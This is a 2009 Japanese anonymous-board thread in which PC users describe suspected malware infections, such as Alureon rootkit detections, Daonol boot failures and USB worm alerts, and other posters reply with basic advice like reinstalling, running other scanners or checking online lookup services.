OSを含めて、すべての設定がなくなっていたり、変更されているという状況です。
これは、ウィルスなのでしょうか?
また元に戻す方法はあるのでしょうか?
ご指導お願いします。
250:249
09/10/22 10:00:57
別スレで回答をもらいましたので、質問を取り下げます。
失礼しました。
251:名無しさん@お腹いっぱい。
09/10/22 11:23:36
【使用OS】 「windousXP」
【Microsoft Update(MU)の状態】 「おそらく最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティ」 「おそらく最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「おそらく最新」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」 「スキャンできない状態」
パソコンについて詳しくない初心者です。
昨日の夜、この前GENOウィルスにPCサイトが感染された知り合いのサイトの携帯版の方にアクセスした後、しばらくしてからウィルスセキュリティからなにかのプログラムを許可しますか、という表示が三回に渡り出て、全てをブロックするを選択しました。
今までそんな事はなかったので、携帯サイトの方もGENOに感染していたのかと思いredist.exeを立ち上げる等の簡易確かめをした所普通に立ち上がり、GENOではないのかと思いそれでも動作が弱冠重くなった気がしていたので怖くなって電源を切ろうとしました。
そうすると、電源を切るを押してもまったくパソコンが動かず、間違えてキャンセルを押したのかともう一度スタートから電源を切るを押してしまいました。
しかしやはり全く動かず恐ろしくなって電源ボタンを長押しして強制終了させました。
その後、壊れたのかと気になって何回かつけようとしたのですが
セーフモード
セーフモードとネットワーク
セーフモードとコマンドプロテクト
前回正常起動時の構成(正しく動作した最新の設定)
windowsを通常起動する
の選択肢のある画面が出てきて、通常起動と正常起動時の構成を試してみたところ2つとも画面が真っ暗で矢印アイコンが出ているだけの状態になり、こちらも恐ろしくて強制終了させてしまいました。
初書き込みだったので至らぬ所があったかもしれないです。失礼をしてしまったらすいません。
かなり困っています。できれば解答よろしくお願いします。
252:名無しさん@お腹いっぱい。
09/10/22 11:34:58
何をどうしたいのかよく分からないけど、ウィルスが疑われるならリカバリ(クリーンインストール)するのが確実
253:名無しさん@お腹いっぱい。
09/10/22 11:44:51
解答ありがとうございます。
リカバリする場合、パソコンのデータは諦めないといけないでしょうか。
バックアップしたいのですが操作ができずそれもすることができません。
254:名無しさん@お腹いっぱい。
09/10/22 14:37:17
知らぬ間に282114というフォルダがあり、
中に道化師というファイルがあった。
全く心当たりないし、ぐぐってもなにもわからない。
これって大丈夫でしょうか?
255:名無しさん@お腹いっぱい。
09/10/23 22:37:46
URLリンク(jisaku-sns.info)
こんな↑感じの小さいグーグルのログイン画面が消しても消しても出てくる。
これってウィルスですか?
256:名無しさん@お腹いっぱい。
09/10/24 01:21:41
全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態
スレリンク(news板)
電話お問い合わせ窓口の混雑について(お詫び) - AzbyClub サポート : 富士通
URLリンク(azby.fmworld.net)
コンピュータウイルス「Torojan.Win32/Daonol.H」について | dynabook.com サポート情報
URLリンク(dynabook.com)
コンピュータウイルス「Win32/Daonol」に関するご注意
URLリンク(supportapj.dell.com)
257:名無しさん@お腹いっぱい。
09/11/01 13:42:00
2日前から決まって夜中3時頃にニコニコ動画をみていたら、
急にモニターに「キャー」という音が鳴り、血しぶきが出てきてその血しぶきが広がっていく映像が出てきます。
めちゃくちゃ怖いのですぐに強制終了したのですが、すごく気になります。
タスクマネージャーを調べたり、ウィルススキャンをかけても何もかかりません。
調べたところずいぶん古い現象らしいのですが、それはウィルスの可能性があり、その現象になったら再起動してもHDDがすぐにガリガリいってイカれる。とありました。
ですが、今のところ血しぶき以外なにもパソコンに悪影響は起こっていません。立ち上げも普通にでき、ファイルも特に変わってなく、タスクマネージャーを見ても特に怪しいものはありませんでした。
しかし今日もあの血しぶきがくるのか?と思うとすごく怖くてパソコンをさわりたくなくなります。
どういった対処をすればよいのでしょうか?
ご存知の方が見えましたら教えて下さい。よろしくお願いします。
258:257
09/11/01 14:52:49
すみません
>>257の補足ですが、自分はニコニコ動画を見ていたのはあまり関係ないのかな、と考えております。
259:名無しさん@お腹いっぱい。
09/11/02 14:50:08
>>257
とりあえず検索したらこんなウイルス名がでてきたわけですが。
規制中だからあとは自分で調べれ。亜種かもねー
↓
W32.HLLW.Antinny.G
260:名無しさん@お腹いっぱい。
09/11/07 10:01:39
インターネットを見ていると、
なぜかやたらactiveコントロール?の許可を求めるアラートが出ました
特に怪しいサイトは見ていなかったので許可していたのですが、
YouTubeの動画を見ているといきなり画面が真っ暗になり、
スピーカーからは小さなハウリング音が聞こえだして操作不能に
一度電源ボタンで電源を切ってまた入れてみましたが、
ドライブが回りかけるような音だけしてその後なんの変化もありません
そして電源ボタンを長押しすると電源が切れる音はします
他にネット環境がないのでケータイから少し調べてみたのですが、
悪意のあるactiveコントロール?にパソコンを破壊されたのでしょうか?
261:名無しさん@お腹いっぱい。
09/11/07 14:13:08
>>260
怪しいサイトでなくても
正規の広告に悪意のあるソフトウェアが紛れ込んでる時がある。
262:名無しさん@お腹いっぱい。
09/11/07 17:17:37
URLリンク(filomediaaidworld.net)
これは無害?
263:名無しさん@お腹いっぱい。
09/11/07 18:22:11
>>262
こっちで聞いて
URLリンク(find.2ch.net)
264:名無しさん@お腹いっぱい。
09/11/08 20:29:42
【使用OS】 Windows XP SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 avast!4
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Spybot(感染後導入・検査)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか】
ファイル名 C:\WINDOWS\system32\tdlwsp.dll
ウイルス名 Win32:Alureon-DR [Rtk]
先日avastにて以上のマルウェアがルートキットとして発見されました。
その時はチェストに入れたり、削除してみたりしてみたにも関わらず、
常駐保護の、あの怖い効果音と共に出てくる窓が30分おきに現れて困っていました。
そこでSpybotや、SDFixを導入し出てきたマルウェアを駆除し、
Malware byte's Anti-MalwareでAureon系が生成する
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall・・・
というレジストリが検出され削除したところ、
avastで30分おきだった表示が1時間おき位になるという微妙な効果が。
また、Win32:Alureon-DRがルートキットとavastで判断されていたので、
GMERやRootkit Detectiveなどを使ってみたのですが効果なし。そこで調べてみたところ、
Win32/Alureon (データ盗聴型トロイの木馬。ネットワークを経由するデータの
盗聴をおこないユーザ名やパスワード、クレジットカード番号などの
データの盗みだしを可能にする。また影響下にあるマシンへ悪意のあるデータを
送り込むことを可能にするほか、ステルス機能を潜り込ませるためのrootkitとしても機能する)
とありました。これは要するにルートキットなの?それともトロイの木馬?
どうやって駆除すればいいのですか?
265:名無しさん@お腹いっぱい。
09/11/08 20:38:27
とりあえずavastでブートタイム検査。
正直、再インスコした方が早いと思うけどね。
266:名無しさん@お腹いっぱい。
09/11/08 22:52:01
URLリンク(megasecuredownload.com)
プレミアムリンク探してたらこんなのに出会った
exeファイルで怪しさムンムンなんだが、どうだろう
267:名無しさん@お腹いっぱい。
09/11/08 22:54:26
URLリンク(megasecuredownload.com)
プレミアムリンク探してたらこんなのに出会った
exeファイルで怪しさムンムンなんだが、どうだろう
268:名無しさん@お腹いっぱい。
09/11/08 23:43:07
>>267
あやしいファイルを実行するスレ 2層目
スレリンク(sec板)
269:名無しさん@お腹いっぱい。
09/11/09 00:05:26
>>266-267
どうもこうも無いよ...思いっきりウイルスですがな。
URLリンク(www.virustotal.com) (10/40)
あんまり検出率良くねーな。新種か?
270:名無しさん@お腹いっぱい。
09/11/09 00:10:37
"The Fourth Kind" この映画の動画関係はウイルス仕込まれてる所があります。
271:名無しさん@お腹いっぱい。
09/11/13 12:12:40
URLリンク(detail.chiebukuro.yahoo.co.jp)
と、同じ症状なんだけどこれってなに?
272:名無しさん@お腹いっぱい。
09/11/14 03:22:42
質問です。
ネットカフェから利用する場合IPアドレスからどの地域まで特定されるのでしょうか?
IPアドレスからネットカフェの名前まで判断できてしまうんでしょうか?
273:名無しさん@お腹いっぱい。
09/11/14 08:50:54
URLリンク(www.aguse.jp)
URLリンク(www.ipaddresser.com)
URLリンク(www.mse.co.jp)
URLリンク(whatismyipaddress.com)
IP調べと言ったら、こんなもんですかね
274:272
09/11/14 12:11:48
>>273さん
ありがとうございます!
275:名無しさん@お腹いっぱい。
09/11/17 08:34:25
ウイルスバスターとは別にオフラインでもウイルスソフトとかちあわず
PCのウイルスを除去するフリーソフトなどはありますか?
今ウイルスセキュリティZERO使ってるんですがどうも調子が悪いような気がします
276:名無しさん@お腹いっぱい。
09/11/17 14:41:04
自分で調べろ
277:名無しさん@お腹いっぱい。
09/11/18 00:41:43
【使用OS】 「XPsp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4.8 home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「zonealarm」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「無線LANのことでしょうか?使っています」
avastでcドライブをはじめ全体をチェックしたところ
\Documents and Settings\****\Local Setting\Temp\plugtmp-4フォルダ内の
plugin-readme.pdfというファイルがJS:Pdfka-SLというのもに感染していました
とりあえずチェストに移しましたが元のファイル自体何なのかよくわかりませんし
このウイルスも危険かどうか判断できず困っています
どのような対応がベストでしょうか?
278:名無しさん@お腹いっぱい。
09/11/18 16:55:21
【使用OS】 「XPsp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「kingsoftの最新版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「不明」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「有り」
ファイル名 s9h3v.bat
ウイルス名 Win32.hack.NsAnti 105151
他のパソコンで使っていたUSBを別のパソコンにさすと,上記のウイルスを削除したと表示がありました.
このウイルスはどういった悪さをするウイルスなのでしょうか?ググッたところ,出てきませんでした..
Win32.hack.NsAnti まででググると105151の数字部分が異なるウイルスがたくさん表示されたようです.
詳しい方いらっしゃればご解答お願いします.
279:名無しさん@お腹いっぱい。
09/11/18 17:50:27
【使用OS】 「WindowsXP Home SP2」
【Microsoft Update(MU)の状態】 「SP2で出来る限りは最新」
【使用セキュリティソフトとバージョン】 「ESET SMART SECURITY4」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「常に最新」
【スパイウェア対策ソフト】 「無」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ウィルスは未検出」
プロセスにIEを起動してないのにiexplore.exeを発見、場所は「C:\RECYCLER\iexplore.exe」
怪しいとおもって調べてみたらどうやらP2P経由で感染する暴露ウィルスの様子
ですが私はWinnyなどのP2Pソフトはやっていないので感染経路が全く不明、いつから感染してるのかも不明・・・
導入しているセキュリティソフトで検査してみたところ何も検出しませんでしたが、しっかりとレジストリは検索した記事通りに書き換えられていました
今のところPCが重くなる等の症状もなく、自分の情報をネットに暴露している様子もないのだけど
これはウィルスではなくただのゴミファイルか何かなのでしょうか
とりあえず怖いのでexeは削除、レジストリも直しておきましたが、非常に心配なので何でも良いので情報提供お願いします
280:名無しさん@お腹いっぱい。
09/11/18 19:26:52
>>279
URLリンク(hjdb.higaitaisaku.com)
281:名無しさん@お腹いっぱい。
09/11/22 19:09:10
>>278
ググルと結構ありますね。
【USBウイルスの捕獲】 [USBメモリに感染するウイルス]
URLリンク(royalwin.blog.so-net.ne.jp)
AhnRpta.exe、xvassdf.exeとの闘い。
URLリンク(orbit.cocolog-nifty.com)
282:名無しさん@お腹いっぱい。
09/11/25 14:30:10
ZIPフォルダの中のウィルスのみを削除できるソフトって
ありますか?
283:名無しさん@お腹いっぱい。
09/11/25 20:12:32
風邪ひいたんだけどどうすればいい?
284:名無しさん@お腹いっぱい。
09/11/26 19:22:23
jword2{1}.cab 気持悪い
285:名無しさん@お腹いっぱい。
09/11/26 21:28:37
【使用OS】 Mac OS X Snow Leopard
【Microsoft Update(MU)の状態】 ソフトウェアアップデートは最新
【使用セキュリティソフトとバージョン】 Norton Intenet Security for Mac 最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 None
【スパイウェア対策ソフトの更新は定期的に行なっているか】 No
【ルータの有無】 Yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されず。
ストーカー(50代無職w)にクラックされてそいつはもう捕まったんだが、
一段落したのでシステムパーティションをフォーマットした後
クリーンインストールしたのだが、どうも動作がおかしい。
そいつはありとあらゆる嫌がらせのウィルスやトロイを仕込んできたのだが、
例えばよくアクセスする特定のサイトをクッキーをいじってアクセスできなくしたり、
絵描きなので仕事道具のアプリを起動できなくしたりと言ったところ。
本題に移る。当然日常でブラウザを多用するわけだが、
Safariの動作が異常なまでに重い。同じ量のウィンドウとタブを開いても
Firefoxの方が遙かに軽いのだ。Mac ProのXeon x2 8-Coreなのでどう考えてもおかしい。
私が気に掛かっているのは捕まった時、
悪あがきでそいつが「そんなの0を書き込んでインストールすればいい」といっていた事。
フォーマットの際0をn回書き込む消去オプションを選択しなかったのだが、
これが原因でまだウィルスが残っているのではないだろうか?
考えられるタイプはアプリのプライオリティを下げる物ではないかと思う。
どう思う?
286:名無しさん@お腹いっぱい。
09/11/30 17:41:22
ウィルスバスターの動画?に出てくる変なハゲオヤジが気持ち悪い。
動画変えて欲しい。
287:名無しさん@お腹いっぱい。
09/12/01 07:31:32
急にPCが重くなって、実はウィルスに感染してたという話はよく聞くけど、
逆に急に滅茶苦茶軽くなって、実は(ry ってことってあるのかな?
確かに最近対策ソフトを変えたんだけど、その直後からじゃなくて1週間後くらいだから
そのせいとは思えないんだけど。(バスター→avast!)
288:sage
09/12/01 13:52:00
質問失礼します
PC素人なので不明な点が多いですが教えて頂ければ幸いです
【OS】 WindowsXP
【ソフト】 マッカーフィー(綴り解らず申し訳有りません)
【バージョン】 最新
【スパイウェア】 不明
【ルータ】 有り(PS3と繋いでいます)
【スキャン結果】 問題無し
ポートの解放はしておらず、掲示板のURLをクリックした所、microsoft outlookのメール画面が大量に開かれ直ぐに電源をOFFしました、再起動後は特に問題は有りませんでした。
開かれたのがmicrosoft outlookと言うこともあり不安です。
大丈夫なのでしょうか…
289:名無しさん@お腹いっぱい。
09/12/01 15:35:37
>>288
URLリンク(ja.wikipedia.org)
ま、ただのイタズラだろ。PCに実害は無いと思うけどね。
念の為ウィルススキャンでもして、二度とそのようなサイトには行かない事だ。
290:名無しさん@お腹いっぱい。
09/12/01 16:03:10
>>289
なるほど、ブラクラと言うんですね
今まで広告が沢山出るのはあったんですがソフトまで出来るとは…
勉強になりました、一応もう一度スキャンかけておきます。
ありがとうございました。m(_ _)m
291:名無しさん@お腹いっぱい。
09/12/03 16:52:26
失礼します。
先ほど、ウィルスバスター2010でコンピュータ全体を検索してみると
TROJ_Gen cx02c7というものが3つ検索されました。
とりあえず、隔離してその後に駆除しようとしたんですが
できませんでした。
これはもう削除してもよろしんでしょうか?
回答よろしくお願いします。
292:名無しさん@お腹いっぱい。
09/12/03 22:23:05
>>291
意味が二通り考えられて、
①隔離した後に駆除を行おうとしたがどちらも失敗した
②隔離はできたけど駆除は出来なかった
どちらにしても見つかった場所や元のファイルによっては起動不可の可能性や
誤検出の可能性もあるんで。
見つかった場所なり書いた方が回答あると思いますよ。
※テンプレ使いましょう。
293:名無しさん@お腹いっぱい。
09/12/03 23:02:27
>>292
すいません。書き直します。
TROJ_Gen cx02c7というウィルスが3つ検出されて、隔離はできたんですが
駆除ができませんでした。
場所はそれぞれ、
C:\Program Files\kgxfyu\
C:\System Volume information\_restore{.......}
.....の所はアルファベットや大文字がずっと続いてます。
C:\Documents and Settings\Owner\Application Data\Sun\Java\Deployment\cache\6.0
の三ヶ所から検出されました。
よろしくお願いします。
294:名無しさん@お腹いっぱい。
09/12/03 23:16:10
>>293
一番上のプログラムファイルのフォルダに心当たりはありますか?
最近新しいプログラムをインストールしたとか。
3番目のは誤検出っぽいですね。。
一度、バスター以外のオンラインスキャンを使って同じ用に検出されるか試して貰えますか?
295:名無しさん@お腹いっぱい。
09/12/04 18:52:03
こんな事あり得るんですか?マウントしてウイルス検索をかけたら、ウイルス0でしたがインストールが終わったらウイルスが見つかりましたとでます。
正直に言いますがnyです。あり得るんでしょうか?
296:名無しさん@お腹いっぱい。
09/12/04 19:48:18
ここは、LANや個人のPCへの侵入、トロイ、ウィルス、スパイウェアなど、
様々なネット上の危険や、その対策方法を語りあうための板です。
パソコン初心者の方は、【 PC初心者板 】で、
ネット上の架空請求などは【 防犯・詐欺対策板 】で質問した方が良い場合があります。
ネット犯罪の被害に遭われた方は、まず警察に相談しましょう。 ▽ 板違いと禁止の投稿
セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。 ▽ 同内容・類似内容スレは立てない
新たにスレを立てる前に必ず「スレッド一覧」を開き、同じようなスレがないかを
検索し確認して下さい。[ 検索方法 Win:Ctrl+F Mac:Command+F ]
もし同内容・類似内容のスレがある場合は、本スレに誘導の上、削除依頼をして下さい。 ▽ 単発質問スレは立てない ▽ 複数のスレに同じ質問(マルチポスト)をしない
質問の際には「スレッド一覧」を「質問」「総合」またはキーワードで検索し、
内容がふさわしいと思われるスレへどうぞ。
他スレで誘導された時には、どのスレから誘導されたのかを必ず書きましょう。
◎ セキュリティ板の自治スレは【 削除議論板 】にあります。ご確認下さい。
297:名無しさん@お腹いっぱい。
09/12/04 20:30:51
| 丶 _ .,! ヽ
> ``‐.`ヽ、 .|、 |
゙'. ,ト `i、 `i、 .、″
| .,.:/"" ゙‐,. ` /
` .,-''ヽ"` ヽ,,,、 !
、,、‐'゙l‐、 .丿 : ':、
、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''` .,"-、
,r"ツぃ丶 `````` ../ `i、
,.イ:、ヽ/ー`-、-ヽヽヽ、-´ .l゙`-、
_,,l゙-:ヽ,;、、 、、丶 ゙i、,,、
,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`": │ `i、
、、::|、、、ヽ,、、. ```: : : ``` 、.、'
.l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´ l゙ ゙).._
,、':゙l:、、`:ヽ、`:、 : `"```¬―'''"`゙^` : ..、丶 .l゙ `ヽ
,i´.、ヽ".、".、"'ヽヽ;,:、........、 、、...,,,、-‘` 、‐ |゙゙:‐,
,.-l,i´.、".`ヽ,,,.".` `゙゙'"`'-ー"``"``r-ー`'": _.‐′ 丿 ,!
j".、'ヽ,".、".、"`''`ー、._、、、 、._,、..-‐:'''′ .、,:" 丿
゙l,"`"`''ヽヽ"`"` ```゙'''"ヽ∠、、、、ぃ-`''''": ` 、._./` ._/`
`'i`ヽヽヽ`''ーi、、、: : 、.,-‐'` 、/`
``ヽン'`"` : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^ ,、‐'"`
`"'゙―-、,,,,..、、 : ..,、ー'"'
298:名無しさん@お腹いっぱい。
09/12/08 02:01:59
【使用OS】XP
【Microsoft Updateの更新の状態】最新
【セキュリティソフトと年式】ウイルスバスター16最新
【回線の種類・ルータの有無】ADSL
【具体的な症状】
謎のプログラムav_md.exeがかなり頻繁に他ファイルにアクセス(改竄?)しようとする。
【過程と措置】
ウイルスバスターでav_md.exeが他ファイルに何かしようとしたらブロックするように設定。
av_md.exeをデリートしようとしたが、できない。
ウイルスバスターでスキャンしても無反応。
STOPZilla(無料トライアル、最新版)でスキャンしてもスルー。
検索しても日本語のサイトは見つからず、海外サイトのみ。
英語がかなり不得意なのであまり情報がつかめない。
新種の悪質なスパイウェア?とか書いてある?
どうか、アドバイスお願いします。
299:名無しさん@お腹いっぱい。
09/12/08 02:16:13
>>298
新種のトロイだね。
オンラインスキャンはやってみた?
どっちにしてもクリーンインストールするのが一番だよ。
300:名無しさん@お腹いっぱい。
09/12/08 08:51:43
ああ、懇切丁寧に書いてあるじゃないか
URLリンク(comprolive.com)
301:名無しさん@お腹いっぱい。
09/12/08 20:49:56
>>300
ありがとう!
よwwwwめwwwwねえwwwwwwwww
302:名無しさん@お腹いっぱい。
09/12/09 17:41:59
【使用OS】 「Vista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っている」
【ルータの有無】 「無」
URLリンク(uproda.2ch-library.com)
こんなのが定期的に出てくるんですがどうしたらいいですか・・・
検索かけて出たもの全て削除したのですが消えません